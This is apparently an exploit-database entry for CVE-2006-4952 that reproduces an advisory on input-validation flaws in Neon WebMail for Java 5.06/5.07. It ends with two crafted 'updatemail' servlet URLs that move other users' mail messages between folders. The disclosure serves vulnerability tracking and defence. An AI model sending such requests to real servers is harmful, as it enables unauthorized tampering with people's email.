NeoSys Neon Webmail for Java 5.06/5.07 - 'updatemail' Servlet Arbitrary Mail Message Manipulation
Author: Tan Chew Keong
type: webapps
platform: jsp
port:
date_added: 2006-09-20
date_updated: 2017-10-20
verified: 1
codes: CVE-2006-4952;OSVDB-29137
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/20109/info
Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include:
- an arbitrary-file-upload vulnerability
- an arbitrary-email-manipulation vulnerability
- multiple SQL-injection vulnerabilities
- an unauthorized-access vulnerability
- multiple directory-traversal vulnerabilities
- an HTML-injection vulnerability.
An attacker can exploit these issues to compromise the affected application.
Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issue; prior versions may also be affected.
http://www.example.com/neonwebmail/updatemail?ID=1&getpost=get&folderid=-1&tofolderid=-9&status=1&execute=move
http://www.example.com/neonwebmail/updatemail?ID=1&getpost=get&folderid=-9&tofolderid=100&status=1&execute=move